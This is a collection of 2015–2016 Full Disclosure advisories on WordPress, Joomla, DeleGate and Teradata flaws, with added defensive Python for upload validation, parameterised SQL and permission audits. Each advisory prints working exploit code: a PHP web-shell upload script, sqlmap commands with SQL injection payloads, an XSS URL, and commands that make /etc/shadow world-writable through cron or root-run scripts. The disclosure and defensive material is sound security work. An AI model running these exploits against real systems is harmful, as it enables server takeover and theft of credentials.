[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client 
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that a user is authenticated or 
what type of file is being uploaded, so any user can upload a shell to the 
target WordPress server:

  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
.
.
  8 $fileName = $_FILES["file"]["name"];
  9 move_uploaded_file($_FILES["file"]["tmp_name"], 
"$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http 
server root.

CVEID:
OSVDB:
Exploit Code:
$target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "";
echo $result;
echo "";
?>
Advisory: http://www.vapid.dhs.org/advisory.php?v=138

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
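The handler above trusts three request-supplied values: the caller's identity (unchecked), upload_dir (used as the destination directory) and the file name (used verbatim). The following is an added example, not code from the MailCWP plugin or from the advisory; it is written in Python rather than PHP to show the validation steps such a handler needs, and the extension allow list, the directory layout and the sample file names are constructed for the illustration.

```python
import os
import re
import secrets
from pathlib import Path

# Constructed policy for this example: the only attachment types the server will store.
ALLOWED_EXTENSIONS = {"txt", "pdf", "png", "jpg", "jpeg", "gif"}


class UploadRejected(Exception):
    """Raised when an upload fails one of the validation checks."""


def safe_attachment_path(base_dir, message_id, client_filename, is_authenticated):
    """Return the Path an attachment may be written to, or raise UploadRejected.

    Each check answers one weakness of a handler that does
    move_uploaded_file(tmp, "$upload_dir/$message_id-$fileName") with request-supplied
    values: the destination directory is fixed by the server, the caller must be
    authenticated, the client-supplied name is reduced to its basename and its
    extension must be allow-listed, and the final path is proven to lie under base_dir.
    """
    if not is_authenticated:
        raise UploadRejected("authentication required")

    # message_id is embedded in the stored name, so it must be a plain integer.
    if not re.fullmatch(r"[0-9]{1,18}", str(message_id)):
        raise UploadRejected("message_id must be numeric")

    # Strip any directory part the client sent ("../", absolute paths, backslashes).
    name = os.path.basename(str(client_filename).replace("\\", "/"))
    if not name or name in (".", ".."):
        raise UploadRejected("empty filename")

    # Only the final extension counts, and it must be on the allow list.
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension %r not allowed" % ext)

    # The stored name is chosen by the server, so the client's name never reaches disk.
    base = Path(base_dir).resolve()
    final = (base / ("%s-%s.%s" % (message_id, secrets.token_hex(8), ext))).resolve()

    # Defence in depth: confirm the resolved path is still inside the upload root.
    if base not in final.parents:
        raise UploadRejected("path escapes upload directory")
    return final


def upload_verdict(base_dir, message_id, client_filename, is_authenticated):
    """Convenience wrapper for logging and tests: 'ok' or the reason the upload was refused."""
    try:
        safe_attachment_path(base_dir, message_id, client_filename, is_authenticated)
        return "ok"
    except UploadRejected as exc:
        return str(exc)
```

A traversal attempt such as `../../etc/evil.png` is not rejected but neutralised: only the basename survives, and the file is stored under a server-generated name inside base_dir, which the final parent check confirms. Keeping the upload root outside the web root, or denying script execution there at the web server, is the complementary control the plugin's fix still relies on.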

Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar

> On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar  wrote:
> 
> Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
> Author: Larry W. Cashdollar, @_larry0
> Date: 2015-07-09
> Download Site: https://wordpress.org/plugins/mailcwp/
> Vendor: CadreWorks Pty Ltd
> Vendor Notified: 2015-07-09 fixed in v1.110

Typo should be v1.100.





[FD] Local root vulnerability in DeleGate v9.9.13

2015-12-29 Thread Larry W. Cashdollar

Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
http://delegate.org/delegate/

Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.s...@delegate.org ys...@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays 
various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, 
Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and 
more. DeleGate mediates communication between servers and clients where 
direct communication is impossible, inefficient, or inconvenient.


Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root; at least 
one of these binaries can be used to escalate the privileges of a local 
user.  The binary dgcpnod creates a node, allowing a local unprivileged 
user to create files anywhere on disk.   By creating a file in 
/etc/cron.hourly a local user can execute commands as root.


Installation of the software via source or binary distribution with the option 
to not run as root results in a script, setup-subin.sh, being run that sets the 
setuid bit on four binaries.  In Linux distributions where this software 
is part of the package list these binaries are not setuid root (Arch Linux).


From documentation http://www.delegate.org/delegate/newbies-ja.shtml 
(translated to English):
Go is included in the binary distribution, or DGROOT that you can build 
from the source to the location of preference, and then change the name 
if necessary. This is the DgRoot. In addition, if needed, you can rename 
the executable file of DeleGate to the name of the preference. This is 
the DgExe.
"In Unix version subin in if you want to use "(such as when using a 
privileged port), do the following.


  (3-2uk) $ cd DgRoot / subin
  $ Sh setup-subin.sh

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi
CVEID: 2015-7556
Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme 
/etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' 
> /etc/cron.hourly/rootme





[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla

2016-07-25 Thread Larry W. Cashdollar

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site: 
http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: i...@huge-it.com
Description: The plugin allows you to add multiple images to the gallery, 
create countless galleries, add a description to each of them, as well as make 
the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to 
the administrative panel to exploit this vulnerability:

SQLi in code via the id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62 
64 $db->setQuery($query);

65 $results = $db->loadObjectList();
66 return $results;
67 }



XSS is here:

root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} 
\;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} 
\;
256: 
CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

$ sqlmap --load-cookies=cookies.txt -u 
"http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*";
 --dbms mysql
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=164


[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

2016-09-28 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions located in ajax_url.php. 

Vulnerable Code in : ajax_url.php

 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
 28 if($_POST['task']=="load_videos_content"){
 29 
 30 $page = 1;
 31 
 32 
 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && 
$_POST['page']>0){
 34 $paramssld='';
 35 $db5 = JFactory::getDBO();
 36 $query5 = $db->getQuery(true);
 37 $query5->select('*');
 38 $query5->from('#__huge_it_videogallery_params');
 39 $db->setQuery($query5);
 40 $options_params = $db5->loadObjectList();
 41 foreach ($options_params as $rowpar) {
 42 $key = $rowpar->name;
 43 $value = $rowpar->value;
 44 $paramssld[$key] = $value;
 45 }
 46 $page = $_POST["page"];
 47 $num=$_POST['perpage'];
 48 $start = $page * $num - $num;
 49 $idofgallery=$_POST['galleryid'];
 50 
 51 $query = $db->getQuery(true);
 52 $query->select('*');
 53 $query->from('#__huge_it_videogallery_videos');
 54 $query->where('videogallery_id ='.$idofgallery);
 55 $query ->order('#__huge_it_videogallery_videos.ordering asc');
 56 $db->setQuery($query,$start,$num);

CVE-2016-1000123
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' 
--data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"  
--level=5 --risk=3
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep 
testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 
2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-3390 OR 1 GROUP BY 
CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 
END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) 
ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 19:36:55
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=169


[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

2016-09-28 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: 
Huge-IT Product Catalog is made for demonstration, sale, advertisements for 
your products. Imagine a stand with a 
variety of catalogs with a specific product category. To imagine is not 
difficult, to use is even easier.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 

Vulnerable Code in : ajax_url.php

 11 define('_JEXEC', 1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' 
--data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
  --level=5 --risk=3

Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: 
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY 
CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 
END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: 
prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN 
(7371=7371) THEN SLEEP(5) ELSE 7371 
END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

Type: UNION query
Title: Generic UNION query (random number) - 15 columns
Payload: 
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL 
SELECT 
2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)--
 FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/example.com'

[*] shutting down at 16:48:10

Advisory: http://www.vapidlabs.com/advisory.php?v=171


[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

2016-09-30 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your 
website. If you wish to show your photos, videos, enclosing the additional 
images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection 
against the functions in ajax_url.php:

In file ajax_url.php:

  11 define('_JEXEC',1);
  12 defined('_JEXEC') or die('Restircted access');
.
.
.
  49 $page = $_POST["page"];
  50 $num=$_POST['perpage'];
  51 $start = $page * $num - $num;
  52 $idofgallery=$_POST['galleryid'];
  53 $level = $_POST['level'];
  54 $query = $db->getQuery(true);
  55 $query->select('*');
  56 $query->from('#__huge_itportfolio_images');
  57 $query->where('portfolio_id ='.$idofgallery);
  58 $query ->order('#__huge_itportfolio_images.ordering asc');
  59 $db->setQuery($query,$start,$num);

CVE-2016-1000124
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' 
--data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
  --level=5 --risk=3


(custom) POST parameter '#1*' is vulnerable. Do you want to keep 
testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 
2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-2264 OR 1 GROUP BY 
CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 
END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) 
ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
---
[13:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:30:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2715 times
[13:30:39] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 13:30:39
Advisory: http://www.vapidlabs.com/advisory.php?v=170

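The four Huge-IT advisories above (gallery v1.1.5, Video Gallery v1.0.9, Catalog v1.0.7 and Portfolio Gallery v1.0.6) share one defect: a request parameter is concatenated straight into a WHERE clause, as in `$query->where('videogallery_id ='.$idofgallery)`. The following is an added example, not code from any of the extensions or the advisories; it reproduces the pattern in Python against an in-memory SQLite table constructed for the illustration, and places the fixed handler beside it so the difference in behaviour on a tautology input is visible.

```python
import re
import sqlite3


def make_sample_db():
    """Constructed stand-in for the #__huge_it_videogallery_videos table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE videos (id INTEGER PRIMARY KEY, videogallery_id INTEGER, title TEXT);
        INSERT INTO videos VALUES (1, 1, 'intro'), (2, 1, 'demo'), (3, 2, 'unlisted');
        """
    )
    return conn


def load_videos_vulnerable(conn, galleryid):
    """Same shape as $query->where('videogallery_id ='.$idofgallery): raw concatenation."""
    sql = "SELECT title FROM videos WHERE videogallery_id = " + str(galleryid) + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def load_videos_fixed(conn, galleryid):
    """Two independent defences: a strict type check, then a bound parameter.

    The regex rejects anything that is not a short run of digits before the value goes
    near the database; the placeholder makes the value data rather than SQL even if the
    check were ever loosened.
    """
    if not re.fullmatch(r"[0-9]{1,10}", str(galleryid)):
        raise ValueError("galleryid must be a positive integer")
    gid = int(galleryid)
    sql = "SELECT title FROM videos WHERE videogallery_id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (gid,))]


def compare_handlers(galleryid):
    """Run the same request value through both handlers.

    Returns (rows from the concatenating handler, rows from the fixed handler); the
    fixed side reports 'rejected' when validation refused the value.
    """
    conn = make_sample_db()
    try:
        vulnerable = load_videos_vulnerable(conn, galleryid)
    except sqlite3.Error as exc:
        vulnerable = "error: %s" % exc
    try:
        fixed = load_videos_fixed(conn, galleryid)
    except ValueError:
        fixed = "rejected"
    return vulnerable, fixed


if __name__ == "__main__":
    for value in ("2", "1 OR 1=1"):
        print(repr(value), "->", compare_handlers(value))
```

With `"1 OR 1=1"` the concatenating handler returns rows from every gallery while the fixed one refuses the request. In the Joomla code the equivalent is to read the value through the typed accessor (`getInt`) or cast it with `(int)` and, for string values, pass them through `$db->quote()`; either way the value is turned into data before it touches the statement. Note also that all four ajax_url.php files define `_JEXEC` themselves on line 11, which is why the `defined('_JEXEC') or die` guard on line 12 never stops an unauthenticated caller.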

[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission

2016-11-10 Thread Larry W. Cashdollar
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file 
permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact
Description: A database appliance for virtual machine environments.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 has insecure file permissions 
on /etc/luminex/pkgmgr. These could allow a local user to modify its contents 
and execute commands as root.

TVME:/ # ls -ld /etc/luminex/
drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/
TVME:/# ls -l /etc/luminex/
total 128
-rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db
-rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr

CVE: CVE-2016-7488
Exploit Code:
$ echo "#/bin/bash" > /etc/luminex/pkgmgr
$ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
$ chmod 755 /etc/luminex/pkgmgr

Advisory: http://www.vapidlabs.com/advisory.php?v=172

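The DeleGate advisory above turns on setuid-root bits in DGROOT/subin, and the Teradata advisory on world-writable files under /etc/luminex that root later executes; both were found by reading `ls -l` output. The following is an added example, not code from either advisory or vendor: a small audit that applies the same two checks, first to long-listing text (the two listings from the advisories are embedded as constructed sample input) and then to a live directory tree via `lstat`, so the check can run on a host before or after an install.

```python
import os
import re
import stat

# Matches one entry of a long listing such as "ls -l" prints:
# mode, link count, owner, group, size, a three-field date, name.
LS_ENTRY = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$"
)


def audit_listing(text):
    """Return (name, issue) pairs for the entries of an ls -l listing that warrant review."""
    findings = []
    for raw in text.splitlines():
        m = LS_ENTRY.match(raw.strip())
        if not m:
            continue  # prompts, "total N" lines, blank lines
        mode, owner, group, name = m["mode"], m["owner"], m["group"], m["name"].strip()
        if mode[3] in "sS":
            findings.append((name, "setuid " + owner))
        if mode[6] in "sS":
            findings.append((name, "setgid " + group))
        if mode[8] == "w" and mode[9] not in "tT":
            kind = "directory" if mode[0] == "d" else "file"
            findings.append((name, "world-writable " + kind))
    return findings


def audit_tree(root):
    """The same checks against a live filesystem, via lstat so symlinks are not followed."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            path = os.path.join(dirpath, entry)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                findings.append((path, "setuid uid=%d" % st.st_uid))
            if st.st_mode & stat.S_ISGID:
                findings.append((path, "setgid gid=%d" % st.st_gid))
            if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
                kind = "directory" if stat.S_ISDIR(st.st_mode) else "file"
                findings.append((path, "world-writable " + kind))
    return findings


# Constructed copies of the two listings from the advisories, used as sample input.
DELEGATE_SUBIN = """\
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh
"""

TERADATA_LUMINEX = """\
drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/
-rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db
-rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr
"""

if __name__ == "__main__":
    for name, issue in audit_listing(DELEGATE_SUBIN) + audit_listing(TERADATA_LUMINEX):
        print("%-20s %s" % (name, issue))
```

On the DeleGate listing the four setuid-root entries are exactly those `setup-subin.sh` chowns and chmods 6550; on the Teradata listing the directory and both files come back world-writable. The directory finding matters on its own: even after `pkgmgr` is fixed to 0755, a world-writable /etc/luminex lets a local user rename the file and drop a replacement in its place.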

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

2016-11-18 Thread Larry W. Cashdollar
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of 
files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database; they provide a Virtual Machine 
image for developers and community use.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 creates files in /tmp 
insecurely, which may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr 
>/dev/null 2>&1` ;

If a regular user controls /tmp/t2a.pl.get_profile.scr before the person 
executing this script creates it, they can inject commands to be executed as 
that user.

for example:

$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; 
done

If root or any other account runs that .pl script, I see these files being 
created in /tmp:

[C] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[U] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 44  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 152  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[C] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr 
 

CVE-ID: CVE-2016-7489
Exploit Code:
$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173


[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

2016-11-18 Thread Larry W. Cashdollar
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 
studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: 
http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool 
that retrieves data from Teradata Database systems and allows the data to be 
manipulated and stored on the desktop. It is built on the Eclipse Rich Client 
Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in 
/tmp insecurely.  A malicious local user could create a symlink in /tmp and 
possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:  jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
Exploit Code:
$ ln -s /tmp/javaver /etc/passed
Advisory: http://www.vapidlabs.com/advisory.php?v=174

